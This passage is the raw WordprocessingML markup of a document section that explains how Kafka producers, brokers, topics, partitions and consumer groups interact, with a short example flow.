    <w:p w14:paraId="664AB3F0" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How They All Interact in a Kafka-Based System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE5E2AA" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="268"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Producers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> send messages to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka broker</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which stores them in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>topic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403583DA" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="268"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka broker</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is responsible for managing message storage and serving </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> who request messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601011D8" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="268"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> subscribe to one or more </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>topics</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and consume messages from the partitions. They are usually part of a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for distributed processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63896887" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="268"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumer groups</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensure that messages from each partition are read by only one consumer within the group, providing load balancing and fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297BF3D0" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="268"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kafka’s architecture allows horizontal scaling: More </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>producers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can send messages, more </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can read messages, and more </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>brokers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can handle the load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13453434" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F066DC" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="269"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Producer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sends a message to the Kafka broker for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Topic A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A6FA11" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="269"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Kafka broker writes the message to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Partition 0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Topic A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD4001D" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="269"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with two consumers, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumer 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumer 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, subscribes to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Topic A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4915639A" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="269"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumer 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> reads messages from </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Partition 0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Topic A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549AF51E" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="269"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumer 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can either consume messages from another partition of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Topic A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or from the same partition if there's more than one partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BA687F" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kafka's architecture ensures </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scalability</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fault tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallelism</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by leveraging producers, brokers, topics, partitions, and consumer groups effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2547BFDB" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="1C64AB4B">
          <v:rect id="_x0000_i3072" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9807BB" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
